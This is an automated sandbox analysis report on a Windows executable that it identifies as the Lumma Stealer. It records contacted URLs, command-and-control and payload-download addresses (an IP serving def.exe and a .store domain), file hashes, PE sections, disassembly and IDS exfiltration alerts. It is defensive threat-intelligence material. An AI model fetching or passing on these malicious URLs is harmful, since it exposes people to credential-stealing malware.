                                                • URL Reputation: safe
                                                unknown
                                                https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=file.exe, 00000000.00000003.1517531200.0000000005608000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                unknown
                                                http://ocsp.rootca1.amazontrust.com0:file.exe, 00000000.00000003.1549025339.00000000056DD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  unknown
                                                  https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqX1CqX4pbW1pbWfpbZ7ReNxR3UIG8zInwYIFIVs9eYifile.exe, 00000000.00000003.1550572571.0000000000E27000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    unknown
                                                    https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696491991400800003.2&ci=1696491991993.file.exe, 00000000.00000003.1550572571.0000000000E27000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      unknown
                                                      https://www.ecosia.org/newtab/file.exe, 00000000.00000003.1517531200.0000000005608000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      unknown
                                                      https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brfile.exe, 00000000.00000003.1550224153.00000000058FA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      unknown
                                                      https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_15d7e4b694824b33323940336fbf0bead57d89764383fe44file.exe, 00000000.00000003.1550572571.0000000000E27000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        unknown
                                                        https://ac.ecosia.org/autocomplete?q=file.exe, 00000000.00000003.1517531200.0000000005608000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        http://185.215.113.16/file.exe, file.exe, 00000000.00000002.1724682643.0000000000DF5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1722966478.0000000000DF4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1722841252.0000000000DEE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          unknown
                                                          https://crisiwarny.store/aufile.exe, 00000000.00000003.1548543584.00000000055D1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            unknown
                                                            https://crisiwarny.store/Hyfile.exe, 00000000.00000002.1724509005.0000000000DA0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1722621117.0000000000DA0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              unknown
                                                              https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpgfile.exe, 00000000.00000003.1550572571.0000000000E27000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • URL Reputation: safe
                                                              unknown
                                                              http://x1.c.lencr.org/0file.exe, 00000000.00000003.1549025339.00000000056DD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              • URL Reputation: safe
                                                              unknown
                                                              http://x1.i.lencr.org/0file.exe, 00000000.00000003.1549025339.00000000056DD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              • URL Reputation: safe
                                                              unknown
                                                              https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchfile.exe, 00000000.00000003.1517531200.0000000005608000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              • URL Reputation: safe
                                                              unknown
                                                              http://crt.rootca1.amazontrust.com/rootca1.cer0?file.exe, 00000000.00000003.1549025339.00000000056DD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              • URL Reputation: safe
                                                              unknown
                                                              https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&ufile.exe, 00000000.00000003.1550572571.0000000000E27000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • URL Reputation: safe
                                                              unknown
                                                              http://185.215.113.16/off/def.exe0file.exe, 00000000.00000002.1724682643.0000000000DF5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1722966478.0000000000DF4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1722841252.0000000000DEE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                unknown
                                                                https://crisiwarny.store/ofile.exe, 00000000.00000003.1516669230.0000000000DFE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  unknown
                                                                  http://185.215.113.16/off/def.exe2file.exe, 00000000.00000002.1724682643.0000000000DF5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1722966478.0000000000DF4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1722841252.0000000000DEE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    unknown
                                                                    https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696491991400800003.1&ci=1696491991993.12791&ctafile.exe, 00000000.00000003.1550572571.0000000000E27000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      unknown
                                                                      https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpgfile.exe, 00000000.00000003.1550572571.0000000000E27000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      unknown
                                                                      http://185.215.113.16/off/def.exefile.exe, file.exe, 00000000.00000002.1724361364.0000000000C7A000.00000004.00000010.00020000.00000000.sdmp, file.exe, 00000000.00000002.1724509005.0000000000DA0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1724682643.0000000000DF5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1722966478.0000000000DF4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1722621117.0000000000DA0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1722841252.0000000000DEE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        unknown
                                                                        https://crisiwarny.store/file.exe, 00000000.00000003.1581702066.0000000000E16000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1724509005.0000000000DA0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1582388699.0000000000E16000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1724509005.0000000000D90000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1516669230.0000000000DFE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1722621117.0000000000DA0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1566593101.0000000000E12000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1722621117.0000000000D90000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          unknown
                                                                          https://support.mozilla.org/products/firefoxgro.allfile.exe, 00000000.00000003.1550224153.00000000058FA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          • URL Reputation: safe
                                                                          unknown
                                                                          https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=file.exe, 00000000.00000003.1517531200.0000000005608000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          • URL Reputation: safe
                                                                          unknown
                                                                          http://185.215.113.16/jfile.exe, 00000000.00000002.1724682643.0000000000DF5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1722966478.0000000000DF4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1722841252.0000000000DEE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            unknown
                                                                            https://crisiwarny.sfile.exe, 00000000.00000003.1566660244.0000000000E00000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1566909072.0000000000E02000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              unknown
                                                                              https://crisiwarny.store/apitfile.exe, 00000000.00000003.1593633698.0000000000E15000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1722535596.0000000000E15000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1724772459.0000000000E15000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                unknown
                                                                                • No. of IPs < 25%
                                                                                • 25% < No. of IPs < 50%
                                                                                • 50% < No. of IPs < 75%
                                                                                • 75% < No. of IPs
                                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                                104.21.95.91
                                                                                crisiwarny.storeUnited States
                                                                                13335CLOUDFLARENETUStrue
                                                                                185.215.113.16
                                                                                unknownPortugal
                                                                                206894WHOLESALECONNECTIONSNLfalse
                                                                                Joe Sandbox version:41.0.0 Charoite
                                                                                Analysis ID:1543581
                                                                                Start date and time:2024-10-28 07:17:17 +01:00
                                                                                Joe Sandbox product:CloudBasic
                                                                                Overall analysis duration:0h 5m 31s
                                                                                Hypervisor based Inspection enabled:false
                                                                                Report type:full
                                                                                Cookbook file name:default.jbs
                                                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                Number of analysed new started processes analysed:6
                                                                                Number of new started drivers analysed:0
                                                                                Number of existing processes analysed:0
                                                                                Number of existing drivers analysed:0
                                                                                Number of injected processes analysed:0
                                                                                Technologies:
                                                                                • HCA enabled
                                                                                • EGA enabled
                                                                                • AMSI enabled
                                                                                Analysis Mode:default
                                                                                Analysis stop reason:Timeout
                                                                                Sample name:file.exe
                                                                                Detection:MAL
                                                                                Classification:mal100.troj.spyw.evad.winEXE@3/2@2/2
                                                                                EGA Information:
                                                                                • Successful, ratio: 100%
                                                                                HCA Information:Failed
                                                                                Cookbook Comments:
                                                                                • Found application associated with file extension: .exe
                                                                                • Stop behavior analysis, all processes terminated
                                                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, conhost.exe
                                                                                • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                • Not all processes where analyzed, report is missing behavior information
                                                                                • Report size getting too big, too many NtOpenFile calls found.
                                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                TimeTypeDescription
                                                                                02:18:24API Interceptor9x Sleep call for process: file.exe modified
                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                104.21.95.91file.exeGet hashmaliciousLummaCBrowse
                                                                                  file.exeGet hashmaliciousLummaCBrowse
                                                                                    file.exeGet hashmaliciousLummaCBrowse
                                                                                      file.exeGet hashmaliciousLummaCBrowse
                                                                                        file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                                                                          file.exeGet hashmaliciousLummaCBrowse
                                                                                            file.exeGet hashmaliciousLummaCBrowse
                                                                                              file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                                                                                file.exeGet hashmaliciousLummaCBrowse
                                                                                                  file.exeGet hashmaliciousLummaCBrowse
                                                                                                    185.215.113.16file.exeGet hashmaliciousLummaCBrowse
                                                                                                    • 185.215.113.16/off/def.exe
                                                                                                    file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                                                                                    • 185.215.113.16/Jo89Ku7d/index.php
                                                                                                    file.exeGet hashmaliciousLummaCBrowse
                                                                                                    • 185.215.113.16/off/def.exe
                                                                                                    file.exeGet hashmaliciousLummaCBrowse
                                                                                                    • 185.215.113.16/off/def.exe
                                                                                                    file.exeGet hashmaliciousLummaCBrowse
                                                                                                    • 185.215.113.16/off/def.exe
                                                                                                    file.exeGet hashmaliciousLummaC, Amadey, AsyncRAT, LummaC Stealer, Stealc, XWormBrowse
                                                                                                    • 185.215.113.16/Jo89Ku7d/index.php
                                                                                                    file.exeGet hashmaliciousLummaCBrowse
                                                                                                    • 185.215.113.16/off/def.exe
                                                                                                    file.exeGet hashmaliciousLummaCBrowse
                                                                                                    • 185.215.113.16/off/def.exe
                                                                                                    file.exeGet hashmaliciousLummaCBrowse
                                                                                                    • 185.215.113.16/off/def.exe
                                                                                                    file.exeGet hashmaliciousLummaCBrowse
                                                                                                    • 185.215.113.16/mine/random.exe
                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                    crisiwarny.storefile.exeGet hashmaliciousLummaCBrowse
                                                                                                    • 172.67.170.64
                                                                                                    file.exeGet hashmaliciousLummaCBrowse
                                                                                                    • 172.67.170.64
                                                                                                    file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                                                                                    • 172.67.170.64
                                                                                                    file.exeGet hashmaliciousLummaCBrowse
                                                                                                    • 172.67.170.64
                                                                                                    file.exeGet hashmaliciousLummaCBrowse
                                                                                                    • 172.67.170.64
                                                                                                    file.exeGet hashmaliciousLummaCBrowse
                                                                                                    • 172.67.170.64
                                                                                                    file.exeGet hashmaliciousLummaC, Amadey, AsyncRAT, LummaC Stealer, Stealc, XWormBrowse
                                                                                                    • 172.67.170.64
                                                                                                    file.exeGet hashmaliciousLummaCBrowse
                                                                                                    • 172.67.170.64
                                                                                                    file.exeGet hashmaliciousLummaCBrowse
                                                                                                    • 172.67.170.64
                                                                                                    file.exeGet hashmaliciousLummaCBrowse
                                                                                                    • 172.67.170.64
                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                    CLOUDFLARENETUSla.bot.sh4.elfGet hashmaliciousUnknownBrowse
                                                                                                    • 162.159.234.76
                                                                                                    RFQ_List.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                    • 188.114.97.3
                                                                                                    XWe8H4gRPb.exeGet hashmaliciousUnknownBrowse
                                                                                                    • 188.114.97.3
                                                                                                    file.exeGet hashmaliciousLummaCBrowse
                                                                                                    • 172.67.170.64
                                                                                                    XWe8H4gRPb.exeGet hashmaliciousUnknownBrowse
                                                                                                    • 188.114.96.3
                                                                                                    z1RECONFIRMPAYMENTINVOICE.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                    • 188.114.96.3
                                                                                                    file.exeGet hashmaliciousLummaCBrowse
                                                                                                    • 172.67.170.64
                                                                                                    file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                                                                                    • 172.67.170.64
                                                                                                    file.exeGet hashmaliciousLummaCBrowse
                                                                                                    • 172.67.170.64
                                                                                                    AWB#21138700102.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                    • 188.114.96.3
                                                                                                    WHOLESALECONNECTIONSNLfile.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                    • 185.215.113.206
                                                                                                    file.exeGet hashmaliciousLummaCBrowse
                                                                                                    • 185.215.113.16
                                                                                                    file.exeGet hashmaliciousStealcBrowse
                                                                                                    • 185.215.113.206
                                                                                                    file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                                                                                    • 185.215.113.16
                                                                                                    file.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                    • 185.215.113.206
                                                                                                    file.exeGet hashmaliciousLummaCBrowse
                                                                                                    • 185.215.113.16
                                                                                                    file.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                    • 185.215.113.206
                                                                                                    file.exeGet hashmaliciousLummaCBrowse
                                                                                                    • 185.215.113.16
                                                                                                    file.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                    • 185.215.113.206
                                                                                                    file.exeGet hashmaliciousLummaCBrowse
                                                                                                    • 185.215.113.16
                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                    a0e9f5d64349fb13191bc781f81f42e1file.exeGet hashmaliciousLummaCBrowse
                                                                                                    • 104.21.95.91
                                                                                                    file.exeGet hashmaliciousLummaCBrowse
                                                                                                    • 104.21.95.91
                                                                                                    file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                                                                                    • 104.21.95.91
                                                                                                    file.exeGet hashmaliciousLummaCBrowse
                                                                                                    • 104.21.95.91
                                                                                                    file.exeGet hashmaliciousLummaCBrowse
                                                                                                    • 104.21.95.91
                                                                                                    file.exeGet hashmaliciousLummaCBrowse
                                                                                                    • 104.21.95.91
                                                                                                    file.exeGet hashmaliciousLummaC, Amadey, AsyncRAT, LummaC Stealer, Stealc, XWormBrowse
                                                                                                    • 104.21.95.91
                                                                                                    file.exeGet hashmaliciousLummaCBrowse
                                                                                                    • 104.21.95.91
                                                                                                    file.exeGet hashmaliciousLummaCBrowse
                                                                                                    • 104.21.95.91
                                                                                                    SecuriteInfo.com.Win32.PWSX-gen.884.23076.exeGet hashmaliciousLummaCBrowse
                                                                                                    • 104.21.95.91
                                                                                                    No context
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exe
                                                                                                    File Type:CSV text
                                                                                                    Category:dropped
                                                                                                    Size (bytes):226
                                                                                                    Entropy (8bit):5.360398796477698
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:Q3La/xw5DLIP12MUAvvR+uTL2ql2ABgTv:Q3La/KDLI4MWuPTAv
                                                                                                    MD5:3A8957C6382192B71471BD14359D0B12
                                                                                                    SHA1:71B96C965B65A051E7E7D10F61BEBD8CCBB88587
                                                                                                    SHA-256:282FBEFDDCFAA0A9DBDEE6E123791FC4B8CB870AE9D450E6394D2ACDA3D8F56D
                                                                                                    SHA-512:76C108641F682F785A97017728ED51565C4F74B61B24E190468E3A2843FCC43615C6C8ABE298750AF238D7A44E97C001E3BE427B49900432F905A7CE114AA9AD
                                                                                                    Malicious:false
                                                                                                    Reputation:high, very likely benign file
                                                                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..
                                                                                                    Process:C:\Users\user\Desktop\file.exe
                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):2869760
                                                                                                    Entropy (8bit):6.4884400855228765
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:49152:IhWttxbruHgVCMFKf5baKCnylWy2XAzI7:IgttxnuHOCpB2+Z/
                                                                                                    MD5:89595DF1365EF9A4D1CB06E2E56DE5E1
                                                                                                    SHA1:95C37D07350B2F7450337DB3E53220CE2CABD5AE
                                                                                                    SHA-256:A1B51F0DCC34F28AF651152B4A9A2FE4BA536FFAED6114BA46FDE1EFCA075C97
                                                                                                    SHA-512:4169140474D4283E78C81863A0F6B4EB9498088F2529EEAE86EB3DFB6BCF62F0B8E9735D9175E5D5CFEB0ECC819C5CAA0E306CC14F20A335779D14788343BB90
                                                                                                    Malicious:true
                                                                                                    Antivirus:
                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                    Reputation:low
                                                                                                    Preview:MZ......................@...........z...................................!..L.!This program cannot be run in DOS mode....$.......PE..L...P(,e.........."...0..$...........@,.. ...`....@.. ........................,......T,...`.................................U...i....`.............................................................................................................. . .@... ....... ..............@....rsrc........`.......2..............@....idata . ...........8..............@...aisygwgx..+......j+..:..............@...pdrbgaqy. ... ,.......+.............@....taggant.@...@,.."....+.............@...................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                    Entropy (8bit):6.545709289312122
                                                                                                    TrID:
                                                                                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                    • DOS Executable Generic (2002/1) 0.02%
                                                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                    File name:file.exe
                                                                                                    File size:2'958'336 bytes
                                                                                                    MD5:65397ed2ae0567709b177f41d0668597
                                                                                                    SHA1:1af8432aef5af0655dc6952fcbac893adae53880
                                                                                                    SHA256:ba91baa187e8253acfb92cb60be2a1c99cb9809f4156475bd12a08e6fb69ed06
                                                                                                    SHA512:3af631ae4012e639f38f1c87cb0cf872263628764e0530c6222a4e0d32d2d15854c359f033919dc50fd58acbd04e80663515a672da205702ffbd14975fd352a2
                                                                                                    SSDEEP:49152:V8KBQNfYOz+eWHpYD0POAGISGfhKyWA6k1aivflaA:VjQVYOz+eWHpYDuOvzGZvM
                                                                                                    TLSH:62D55CA2B50972CFD48F5778842BCD625A5E42F8072148C3EC6DB8BA7D67CC615B7C28
                                                                                                    File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...S..g.................J...........00...........@..........................`0.....m:-...@.................................T...h..
                                                                                                    Icon Hash:00928e8e8686b000
                                                                                                    Entrypoint:0x703000
                                                                                                    Entrypoint Section:.taggant
                                                                                                    Digitally signed:false
                                                                                                    Imagebase:0x400000
                                                                                                    Subsystem:windows gui
                                                                                                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                    DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                                    Time Stamp:0x6715D353 [Mon Oct 21 04:06:43 2024 UTC]
                                                                                                    TLS Callbacks:
                                                                                                    CLR (.Net) Version:
                                                                                                    OS Version Major:6
                                                                                                    OS Version Minor:0
                                                                                                    File Version Major:6
                                                                                                    File Version Minor:0
                                                                                                    Subsystem Version Major:6
                                                                                                    Subsystem Version Minor:0
                                                                                                    Import Hash:2eabe9054cad5152567f0699947a2c5b
                                                                                                    Instruction
                                                                                                    jmp 00007FDE8C69677Ah
                                                                                                    lar ebp, word ptr [00000000h]
                                                                                                    add cl, ch
                                                                                                    add byte ptr [eax], ah
                                                                                                    add byte ptr [eax], al
                                                                                                    inc ecx
                                                                                                    push bx
                                                                                                    dec esi
                                                                                                    dec ebp
                                                                                                    das
                                                                                                    xor al, 36h
                                                                                                    dec edi
                                                                                                    bound ecx, dword ptr [ecx+4Ah]
                                                                                                    dec edx
                                                                                                    insd
                                                                                                    push edi
                                                                                                    dec eax
                                                                                                    dec eax
                                                                                                    jbe 00007FDE8C6967E2h
                                                                                                    push esi
                                                                                                    dec edx
                                                                                                    popad
                                                                                                    je 00007FDE8C6967DBh
                                                                                                    push edx
                                                                                                    dec esi
                                                                                                    jc 00007FDE8C6967EAh
                                                                                                    cmp byte ptr [ebx], dh
                                                                                                    push edx
                                                                                                    jns 00007FDE8C6967B7h
                                                                                                    or eax, 49674B0Ah
                                                                                                    cmp byte ptr [edi+43h], dl
                                                                                                    jnc 00007FDE8C6967BDh
                                                                                                    bound eax, dword ptr [ecx+30h]
                                                                                                    pop edx
                                                                                                    inc edi
                                                                                                    push esp
                                                                                                    push 43473163h
                                                                                                    aaa
                                                                                                    push edi
                                                                                                    dec esi
                                                                                                    xor ebp, dword ptr [ebx+59h]
                                                                                                    push edi
                                                                                                    push edx
                                                                                                    pop eax
                                                                                                    je 00007FDE8C6967C7h
                                                                                                    xor dl, byte ptr [ebx+2Bh]
                                                                                                    popad
                                                                                                    jne 00007FDE8C6967BCh
                                                                                                    dec eax
                                                                                                    dec ebp
                                                                                                    jo 00007FDE8C6967B3h
                                                                                                    xor dword ptr [edi], esi
                                                                                                    inc esp
                                                                                                    dec edx
                                                                                                    dec ebp
                                                                                                    jns 00007FDE8C6967C0h
                                                                                                    insd
                                                                                                    jnc 00007FDE8C6967E0h
                                                                                                    aaa
                                                                                                    inc esp
                                                                                                    inc ecx
                                                                                                    inc ebx
                                                                                                    xor dl, byte ptr [ecx+4Bh]
                                                                                                    inc edx
                                                                                                    inc esp
                                                                                                    bound esi, dword ptr [ebx]
                                                                                                    or eax, 63656B0Ah
                                                                                                    jno 00007FDE8C6967C8h
                                                                                                    push edx
                                                                                                    insb
                                                                                                    js 00007FDE8C6967E1h
                                                                                                    outsb
                                                                                                    inc ecx
                                                                                                    jno 00007FDE8C6967C2h
                                                                                                    push ebp
                                                                                                    inc esi
                                                                                                    pop edx
                                                                                                    xor eax, dword ptr [ebx+36h]
                                                                                                    push eax
                                                                                                    aaa
                                                                                                    imul edx, dword ptr [ebx+58h], 4Eh
                                                                                                    aaa
                                                                                                    inc ebx
                                                                                                    jbe 00007FDE8C6967BCh
                                                                                                    dec ebx
                                                                                                    js 00007FDE8C6967B3h
                                                                                                    jne 00007FDE8C6967A1h
                                                                                                    push esp
                                                                                                    inc bp
                                                                                                    outsb
                                                                                                    inc edx
                                                                                                    popad
                                                                                                    dec ebx
                                                                                                    insd
                                                                                                    dec ebp
                                                                                                    inc edi
                                                                                                    xor dword ptr [ecx+36h], esp
                                                                                                    push 0000004Bh
                                                                                                    sub eax, dword ptr [ebp+33h]
                                                                                                    jp 00007FDE8C6967CCh
                                                                                                    dec edx
                                                                                                    xor bh, byte ptr [edx+56h]
                                                                                                    bound eax, dword ptr [edi+66h]
                                                                                                    jbe 00007FDE8C6967AAh
                                                                                                    dec eax
                                                                                                    or eax, 506C720Ah
                                                                                                    aaa
                                                                                                    xor dword ptr fs:[ebp+62h], ecx
                                                                                                    arpl word ptr [esi], si
                                                                                                    inc esp
                                                                                                    jo 00007FDE8C6967E3h
                                                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x5a0540x68.idata
                                                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x5a1f80x8.idata
                                                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                    0x10000x580000x27e00efa35e0841bbb55ef0f5796303f5bed5False0.9980101391065831OpenPGP Secret Key7.977471992304813IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                    .rsrc 0x590000x10000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                    .idata 0x5a0000x10000x200555a11fa24a077379003c187d9c9d020False0.14453125data0.9996515881509258IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                    jmvediaj0x5b0000x2a70000x2a6e008aa352c8304462f85870ff5c4f63bf83unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                    famfwksn0x3020000x10000x400aef04906b6c81ecd29322d1fc7aa9ec6False0.7900390625data6.0886251130241655IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                    .taggant0x3030000x30000x2200a6cf53ae3735e707d835947d5fe2606fFalse0.3991268382352941DOS executable (COM)4.221866933034502IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                    DLLImport
                                                                                                    kernel32.dlllstrcpy
                                                                                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                    2024-10-28T07:18:26.832629+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.849705104.21.95.91443TCP
                                                                                                    2024-10-28T07:18:26.832629+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.849705104.21.95.91443TCP
                                                                                                    2024-10-28T07:18:28.033097+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.849706104.21.95.91443TCP
                                                                                                    2024-10-28T07:18:28.033097+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.849706104.21.95.91443TCP
                                                                                                    2024-10-28T07:18:34.637074+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.849710104.21.95.91443TCP
                                                                                                    2024-10-28T07:18:41.233523+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.849713104.21.95.91443TCP
